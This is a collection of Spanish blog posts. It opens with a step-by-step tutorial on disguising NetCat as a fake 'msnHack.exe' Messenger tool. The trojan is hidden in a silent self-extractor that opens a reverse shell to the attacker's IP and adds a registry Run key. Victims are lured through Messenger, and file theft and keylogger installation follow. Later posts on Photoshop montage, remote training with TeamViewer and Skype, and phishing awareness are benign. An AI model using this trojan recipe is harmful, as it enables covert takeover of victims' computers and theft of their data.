Por Guido Javier Granobles.

Vamos a ver como apoderarnos de una maquina remota de manera clandestina usando NetCat.  NetCat es una herramienta que permite abrir puertos y escuchar conexiones arbitrariamente.  Vamos a explicar algunos términos para los menos versados en estos temas pero que sienten mucha curiosidad cuando se habla de apoderarse de una maquina remotamente. Primero para hacer esto necesitamos una IP pública, ya sea en nuestra maquina o en alguna a la cual tengamos acceso, por ejemplo el servidor web de tu sitio de trabajo debe tener una IP pública, si tienes acceso a esa máquina ya estás listo; por otro lado, algunos proveedores de internet te ofrecen la posibilidad de adquirir una IP publica con tu plan tan solo pagando unos pesos de mas. Pero qué diablos es una dirección IP?, bueno una IP  sencillamente es un juego de números divididos en 4 bloques separados por puntos (IPv4) por ejemplo 192.168.1.43 es una dirección IP y sirve para identificar a tu maquina dentro de una red por lo que no pueden existir dos maquinas con la misma dirección IP. Existen dos clases de IP, las públicas y las privadas, las privadas son para redes locales, por ejemplo dentro de un edificio de oficinas todas las IP serán privadas es decir que ningún computador externo a la oficina podrá ver esos equipos, solo se pueden ver entre ellos mismos. Las IP públicas son las IP's que se pueden ver desde el exterior, es decir cualquier computador que tenga acceso a internet podrá ver cualquier computador que tenga una IP pública. Las IP's privadas son asignadas arbitrariamente por el administrador de la red dentro de un edificio de oficinas, mientras las IP públicas son asignadas por un ente encargado en cada país, por ejemplo, las IP publicas en Colombia son asignadas por la Universidad de los andes, así que cuando tu solicitas una IP publica a tu operador, este a su vez la solicita a Uniandes. Debes entender esto, si no tienes una IP publica nadie puede comunicarse directamente a tu computador sino es a través de servidores con IP pública; cuando usas Messenger o Skype, son los servidores de tu operador de internet los que envían tus mensajes al internet y te devuelven las respuestas; en pocas palabras tu operador de internet es tu ventana para comunicarte al exterior.

Bueno y a que viene todo esto?.. humm... bueno el asunto es que tu no podrás accesar la máquina de tu victima directamente por que en el 95% de los casos la víctima no tendrá una IP pública. La solución a este problema es que sea la máquina de la victima la que se conecte a una IP publica y envié lo que necesitamos... en otras palabras, sino puedes ir a la montaña has que la montaña venga a ti... pero claro necesitas esa bendita IP pública para que la maquina victima te pueda ver... bueno ese ya es tu problema.. espero que ahora si tengas claro porque diablos necesitas una IP pública o por lo menos tener acceso a una maquina que la tenga. Que haces en la maquina con la IP pública?.. eso se explica al final, por ahora vamos a preparar el troyano.

El famoso caballo de Troya, que los Troyanos aceptaron como regalo de sus enemigos para poner fin a la guerra, pero que escondía un grupo de guerreros camuflados en su interior los cuales significaron la muerte para la ciudad de Troya... he ahí la definición de un programa Troyano, se ve inofensivo, lo aceptas, lo ejecutas y has entregado tu maquina a manos enemigas.  Vamos a convertir NetCat en un Troyano. La idea general es la siguiente, camuflas NetCat en un programa de apariencia inofensiva cuyo nombre será msnHack.exe, le dices a la victima que con este programa podrá saber quien lo bloquea en Messenger. Primero en tu maquina con IP publica ejecutas NetCat para que escuche conexiones en un puerto, luego cuando tu victima ejecute el troyano habiendo creído tu historia, el NetCat camuflado se conectara a tu IP pública y te entregara una Shell y listo con esta Shell ya puedes ejecutar los comandos que quieras en la máquina de la víctima, tal como si estuvieras sentado frente a ella.... hummmm alguien se estará preguntado... qué diablos es una Shell?.. una Shell en Windows es un programa que se ejecuta en una ventana donde puedes escribir comandos, para borrar archivos, listar archivos entre otras muchas cosas. Pruébalo, entra a menú inicio en tu Windows y en ejecutar escribe CMD le das enter y tendrás una ventana de fondo negro y un prompt para escribir... bien a los mas sabiondos les pido disculpas.. ya sé que saben todo eso..pero esto esta dirigido a todo publico...

Bueno para empezar bájate el NetCat de este enlace. Lo primero es que vamos a cambiar el icono del NetCat por uno muy llamativo, yo voy a usar un icono de Messenger el cual conseguí en Msn Buddy Icons . Para cambiar ese icono debes instalar el ResHacker, lo descargas lo instalas y ahora lo ejecutas:

Ahora vas a la opcion File—>Open y buscas el nc.exe que esta en la carpeta donde instalaste NetCat:

Ahora escoges del menu Actions—>Add new resources:

Eso te abrirá una venta como esta:

Ademas se ha hecho una copia de seguiridad llamada nc_original.exe, bien ahora haces click derecho sobre nc.exe y escoges renombrar, llamalo msnHack.exe, le das enter y listo:

Lo que sigue es que vamos a crear un archivo comprimido auto extraible, para ello debes tener instalado el Winrar en tu equipo. Para que crear el auto extraible, haces click derecho sobre msnHack.exe y eliges añadir al archivo:

La primer ventana que te despliega has que quede igual a la de la imagen:

Ahora haz click en la ficha de Avanzado y luego en el boton Autoextraible:

Bien, ahora viene la parte mas importante,  mira esta imagen:

En la parte donde dice Carpeta de extracción colocas %homedrive%%homepath%\update  lo cual significa que nuestro archivo se descomprimirá en la carpeta Update del disco donde este instalado Windows y en la carpeta personal del usuario que lo descomprime.

En donde dice ejecutar tras la extracción colocas msnHack.exe -d -e cmd.exe 190.145.XX.XX 2378  donde debes remplazar 190.145.XX.XX  por la dirección IP publica tuya. Lo que hace esto es que inmediatamente se descomprima se ejecutar el NetCat (msnHack.exe) y se conectara a nuestra maquina con IP publica xxxx en el puerto 2378 entregándonos una Shell (CMD.exe).

Por último donde dice Ejecutar antes de la extracción colocas %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "msnHack" /t REG_SZ /d "%homedrive%%homepath%\update\msnHack.exe -d -e cmd.exe 127.0.0.1 80" /f > nul.  Eso es para que registre el NetCat (msnHack) en el registro de arranque, así cada vez que se inicie Windows se ejecutara el NetCat.

Ahora haces click en la ficha de Modos y haces click en ocultar todo, esto para que no le muestre nada al usuario de lo que está haciendo cuando se descomprime:

Ahora click en la ficha Texto e icono:

Haz click en el boto Examinar junto a “Cargar icono desde fichero”,  buscas el mismo icono de menssenger que usamos con ResHack y listo eso es todo, le das OK a todo cierras y al final tendremos estos archivos:

El archivo MSNHack2.exe es finalmente el que debemos enviar a la víctima. Cómo?… bueno te conectas al Messenger escoges la victima entablas conversación y luego le cuentas de ese maravilloso programa que puede decirle quien lo bloquea en Messenger, o bueno cualquier cosa creíble que se te ocurra. Pero antes de esto volvamos a hablar de la maquina con la IP pública.

Antes de enviar el archivo a tu victima primero debes ejecutar el siguiente comando en la máquina de la IP pública, asumo que ya tienes instalado el NetCat en esa máquina. En m caso yo uso una maquina con sistema operativo Linux, pero se ejecuta igual en Windows…. ósea vas a menú inicio ---> ejecutar escribes CMD presionas enter y en la ventana que aparece escribes  nc –l 2378:

Le estamos diciendo al NetCat que escuche conexiones en el puerto 2378. Ojo!!!! repito esto solo funcionara en tu equipo Windows si tienes la IP pública y las has colocado en el archivo auto extraíble que configuramos anteriormente.

Ok, si todo va bien, una vez la víctima ha ejecutado el archivo que le enviamos inmediatamente  veras algo como esto en tu pantalla:

Y bueno el equipo de la víctima se ha conectado al mío y me ha entregado una Shell, como puedes ver se abre el directorio update que fue donde colocamos que se copiara cuando se descomprimiera el autoextraíble, ahora puedo ejecutar los comandos que quiera como por ejemplo:

Lo que se puede hacer con esto ya es mucho, se puede copiar los archivos como fotos, documentos Word, Excel etc.… de la victima a tu equipo, se pueden borrar archivos, copiar archivos y programa de tu equipo al de la víctima, introducir virus, Keyloggers para capturar contraseñas etc.… 

Bueno ahora ya sabes cómo se puede o puedes ser fácilmente victima de un Troyano…..hummm yo sospecharía de cualquier ejecutable o comprimido que quieran enviarme por Messenger.

Por Guido J. Granobles

Photoshop se ha convertido hoy día en una de las herramientas de diseño grafico más popular del mercado. Es prácticamente el software más usado para el retoque fotográfico y la edición de imágenes. Con Photoshop puedes convertir a una mujer muy normal en una hermosa reina de belleza. Seguramente muchos de ustedes han recibido correos con fotografías de supuestos hallazgos científicos o arqueológicos, fotografías que al verlas te hacen estremecer por su increíble realismo, de hecho existen concursos donde el ganador es quien haga el mejor foto montaje, el engaño más grande que se pueda hacer distribuyendo fotos en la red de tal manera que todos creamos en la originalidad de la fotografía.

Muchos de nosotros nos sentimos curiosos acerca de cómo pueden hacerse esos foto montajes lo cual es una de las cientos de cosas que puedes hacer con Photoshop.  He grabado un video tutorial para enseñarles en 10 minutos de manera rápida  como pueden hacer un foto montaje simple. Al finalizar este video tutorial estaré en una de las avenidas principales de Sídney Australia, lugar donde por supuesto nunca he estado, pero espero poder estar.  Luego del tutorial podrán hacer sus fotos de todos esos sitios lejanos del planeta donde han estado, o quizás las fotografías con sus artistas favoritos, que tal esa foto de aquella vez que saliste con Nataly Umaña, bueno pueden divertirse un buen rato aprovechando todo lo que les brinda Photoshop.

(Los usuarios de facebook pueden ver el video tutorial en http://guido-granobles.spaces.live.com/)

Por: Guido Javier Granobles P.

Gracias al internet se pueden hacer muchas cosas sin salir de casa.  Se pueden iniciar muchos negocios sin la extrema necesidad de tener un local físico para atender los clientes.  Como ejemplo tenemos las muchas instituciones que enseñan idiomas a través de internet e innumerables universidades, sobre todo en Estados Unidos que ofrecen pregrados tan solo con sentarte frente a tu computadora según el horario que más te convenga.  Por otro lado tal vez algunos de nosotros hemos tenido la necesidad que se nos capacite en el uso de algún software o capacitar a un grupo de personas en cualquier ámbito (no solo software) en el cual necesitamos ayudas audio visuales pero con el pequeño inconveniente que todos no están en el mismo lugar.  Existen muchas herramientas comerciales que te brindan muchas posibilidades pero muy costosas. Aquí les presento una manera de hacer esto posible sin ningún costo y de una manera eficiente.

Supongamos que necesitas capacitar a 5 personas que se encuentran en cinco lugares diferentes del país. Necesitas que esas 5 personas se conecten a tu computadora y vean todo lo que tú haces en ella;  si estas capacitándolos para el uso de un software tal vez querrás que vean como lo operas, si se trata de discutir sobre estadísticas y estrategias quizás tengas presentaciones de diapositivas que deseas que ellos vean. Pero también necesitas que te escuchen mientras hablas, al mismo tiempo que necesitas escucharlos, tal como en una teleconferencia.  Bien ahora la gran pregunta ¿cómo logro todo esto?  La respuesta está en dos software que por estos días se han vuelto muy populares, hablo del Team Viewer y Skype. El Team Viewer te permite compartir tu escritorio de manera remota, lo que permitirá que varias personas se conecten a tu computadora y puedan ver tu escritorio. Puedes descargar Team Viewer desde aquí, existen varias versiones pero por supuesto la que te interesa es la versión gratuita.  Una vez todos los  participantes lo hayan instalado, ejecutas Team Viewer en tu equipo y podrás ver esta ventana:

En la imagen podemos ver las etiquetas ID y contraseña, las cuales tendrás que comunicar a todos los participantes ya que esta información será la que ellos usen para conectarse a tu computadora;  mientras tanto tu no debes hacer nada en tu equipo, solo comunica estos datos y espera que ellos se conecten. En el otro extremo todo lo que los participantes remotos deben hacer es digitar el ID que les has dado y hacer click en conectar con asociado lo cual les pedirá inmediatamente la contraseña.  Bien ya tienes a todos tus participantes conectados y a partir de este momento ellos podrán ver cualquier acción que realices en tu computadora.

El segundo paso es instalar Skype el cual es una herramienta totalmente gratuita que te permite hacer llamadas computador a computador, incluso computador a teléfonos fijos, teléfono móviles que incorporan Skype y enviar mensajes de texto. Además también puedes hacer video conferencia aunque cuando se trata de video solo es posible entre dos personas, en cuanto a voz puedes tener una charla con hasta 24 personas simultáneamente. Puedes descargar Skype desde aquí. Es muy sencillo instalarlo y una vez hallas terminado la instalación el mismo software te facilitara la creación de tu cuenta, para lo cual no te pide mucha información; luego de instalarlo es muy fácil de usar, tal como lo haces con Messenger.

Después de iniciar sesión agrega los participantes a tu lista de contactos, ellos deberán aceptarte en su lista y esperar tu llamada. Inicias llamando a uno de ellos y luego dando click en el botón ‘+ Agregar personas’ empezaras a llamar a cada uno de los participantes.  Eso es todo, tendrás a todos los participantes  viendo tus acciones en tu equipo al mismo tiempo que charlas con ellos.
La calidad del sonido en Skype es  muy alta, pero cabe mencionar que solo obtendremos el máximo rendimiento si todos los participantes se conectan a internet a través de una conexión de banda ancha como mínimo de 256Kbps, aunque sería posible con menos que esta velocidad las comunicaciones pueden volverse inestables o presentar caídas continuas.

Las utilidades de estas herramientas son muchas, desde pedir ayuda a un amigo para resolver un problema en tu computadora o montar tu propia empresa de soporte remoto para usuarios de Windows hasta explotar tus conocimientos dictando cursos desde tu casa, entre muchas otras utilidades aplicadas en el ámbito empresarial.  Las versiones comerciales de Team Viewer traen muchas mas ventajas pero claro está que debes pagar por ellas. Por último debo mencionar otra herramienta gratuita que permite este tipo de conexión pero que lamentablemente no permite la conexión simultanea de varias personas, hablo del Logmein que también se ha hecho muy popular.

Bien espero que para algunos les sea útil esta información de acuerdo a su trabajo o sus actividades diarias.

Por: Guido Javier Granobles P.

Muchos se preguntan que tan facil es que alguien robe su contraseña de correo electronico y la verdad es que la unica manera de que esto suceda es que la entreguemos nosotros mismos cayendo en alguna de las tantas trampas que circulan por la red.  Algunos piensan que existe algun programa donde simplemente pones el correo del cual quieres robar la contraseña e inmediatamente te la da. Pues bien no existen tales programas magicos que roben contraseñas de los servidores de Hotmail. Si bien en sus inicios los servidores de Hotmail tenian fallos de seguridad enormes, propiamente hablando de la aplicacion web que dministra el correo, hoy en dia todos esos fallos han sido corregidos y la seguridad es bastante fuerte.  Por lo tanto el robo de contraseñas por estos tiempos se basa en probar la ingenuidad de los usuarios de la red.  Ahora veamos cuales son las formas mas comunes o los engaños mas usados para robar nuestra contraseña:

Exploits:  Los exploits son fragmentos de codigo que se escriben para "explotar" errores que existen en ciertas aplicaciones, yo diria que en realidad lo que les describire no son exploits, yo mas bien lo llamaria pishing, pero en casi el 90% de la web la gente habla de exploits, no voy a entrar en esa discusion pero el pishing a diferencia del exploit lo que hace es engañar a un usuario haciendole creer que se encuentra ante una pagina oficial de algun ente por lo cual la inocente victima confiadamente entrega sus datos incluyendo cualquier password que se le pida.

Pues bien eso es lo que hacen los mal llamados "Exploits" para Hotmail. Bueno te preguntaras, ¿como puedo caer en eso?. La verdad es que hoy en dia es dificil encontrar  a alguien que caiga en una trampa asi, pero que los hay los hay. Para hacerte caer en dicho engaño el atacante envia un correo con la direccion del remitente falsificada, si asi como lo lees; es muy facil falsificar la direccion de un remitente, solo necesitas conseguir un servidor SMTP que te permita escribir correos desde él, pero bueno no tienes que ser el super experto, porque existen pequeños programas que hacen todo el trabajo sucio, ubican el servidor y el atacante solo coloca la cuenta de correo que quiere que aparesca como el remitente y coloca el mensaje que quiere enviar. Bien, pues usando una herramienta como esta el atacante envia un correo el cual puede contener un formulario html donde se le pide a la victima que digite su contraseña.

Por ejemplo te puede llegar un correo de parte del staff de hotmail solicitandote por cualquier razon que digites tu contraseña, y eso es todo, ¿ que sucede ?, que una vez haces click en el boton aceptar que viene en el correo, tu contraseña sera enviada al correo verdadero del atacante y listo, sin ningun truco raro te han robado tu contraseña, pero solo porque tu la entregaste.   Bueno existe algo mas que el atacante debe configurar en el mal llamado "Exploit", pero no es el fin de este articulo entrar en esos detalles.

Para finalizar esta parte de los exploits debo aclarar que por estos dias la mayoria de los servidores de correo electronico no estan aceptando html  como parte del cuerpo de un mensaje, asi que nuestros amigos amantes del engaño ya no envian un formulario para que escribas tu contraseña, ahora ellos envian un link pidiendote que hagas click para ir a determinado sitio, cuando haces click en este link finalmente estaras en otro sitio web que aparentemente es de la entidad original, como puede ser el staff de Hotmail o el banco y alli nuevamente te piden ingresar tus datos incluyendo la contraseña.

Quien te  admite: La segunda forma mas comun es el uso de sitios web que supuestamente te dejaran saber si alguien te borro o te bloqueo en el Messenger, esta forma si que se ha popularizado, todos quieren saber si fulanito lo tiene bloqueado porque hace rato que no lo ven conectado, entonces llega el correo salvador donde te dicen que visites un sitio web, una vez alli debes ingresar tu correo y tu contraseña, despues de lo cual te sacaran con un error diciendote que no hay conexion con el servidor de Hotmail, que ocurrio un error inesperado, y finalmente te cansas y te sales del sitio web, pero sin darte cuenta que estas en manos enemigas.

Quiero saber esa contraseña: La tercera manera, es que en tu afan de conseguir la contraseña de alguien para descubrir los oscuros secretos que guarda en su correo, terminas siendo tú la victima, ¿ como ?. Es muy facil, buscas afanosamente en la web un programa que haga la magia de revelarte la contraseña del correo deseado, y si!! por fin encuentras ese programa maravilloso. Este programa te pide que ingreses el correo de la vicitima, tu correo y ademas tu contraseña, hummm.... pero ¿ para que requiere tu contraseña ? ya caiste. 

Tambien puedes llegar a un foro donde te dicen que el servidor de hotmail tiene un fallo muy grande que para aprovecharlo ( A hora si estamos hablando de un exploit ) debes escribir un correo dirigido a por ejemplo password_audit.live@hotmail.com, te dicen que este es el correo al que se envia informacion cuando has perdido tu contraseña y que todo lo que tienes que hacer es enviar el correo de la vicitima, el correo donde quieres que llegue la respuesta (el cual es tu correo) y el password de ese correo, claro, y ademas te dicen que debes escribir alguna tonteria porque eso es lo que hace que falle el servidor de Hotmail mandando la contraseña supuestamente a tu correo.

Los KeyLogger:  La cuarta manera es un poco mas complicada, porque el atacante necesita instalar un programa en el equipo de la victima, este tipo de programas se conocen comunmente como KeyLoggers. Estos programas lo que hacen es capturar y guardar en un archivo de texto todas las pulsaciones de teclado que la victima haga; por supuesto si tienes instalado un KeyLogger cada vez que escribas tu contraseña esta quedara guardada en dicho archivo.

Existen dos manera del atacante para revisar este archivo, una es que tenga acceso fisico al equipo de la victima, con lo cual no le quedara muy dificil abrir y revisar el archivo y la segunda es programar el KeyLogger para que lo envie automaticamente a su correo ( Obviamente si esta conectado a internet ).
La victima nunca se percata de la existencia de un KeyLogger en su equipo ya que no existen iconos ni nada en la barra de tareas que le indique su ejecucion. Aunque los detectores de spywares y malwares pueden detectar su presencia.

Finalmente a estos programas podemoa agregar los troyanos que se instalan secretamente en nuestros equipos cuando recibes archivos que te envian por Messenger, lo mas comun es que aparece un contacto nuestro el cual conocemos y nos envia un archivo con supuestas fotos, al descargarlo porque viene de una fuente confiable, en realidad estamos infectando nuestro equipo con un troyano que hara tareas similares a la del KeyLogger entre otras cosas,  tales como permitirle acceso remoto a tu equipo al atacante.

Que mas se puede esperar:  Las otras maneras son las mas conocidas y tambien menos eficientes, como por ejemplo el ensayo y error, adivinar la respuesta de la pregunta secreta si se conoce bien a la victima y bueno habran formas menos comunes pero siempre basadas en el engaño.

Conclusiones.

En definitiva debemos ser muy maliciosos a la hora de analizar los correos que recibimos, en las promesas de que podremos saber quien nos bloquea en Messenger, cualquier sitio que nos pida ingresar la contraseña de nuestro correo es altamente sospechoso, de echo eso nunca deberia suceder. Sospechar tambien de los contactos de messenger que derepente aparecen enviandonos archivos, en ese momento no es tu amigo quien esta conectado, es un virus especial que se conecta con la cuenta de tu amigo. Y bueno instala un antivirus en tu equipo y asegurate que puede detectar los KeyLoggers y troyanos.

Espero que esta información les sea util y sean un poco mas desconfiados cada vez que noten cosas raras mientras navegan.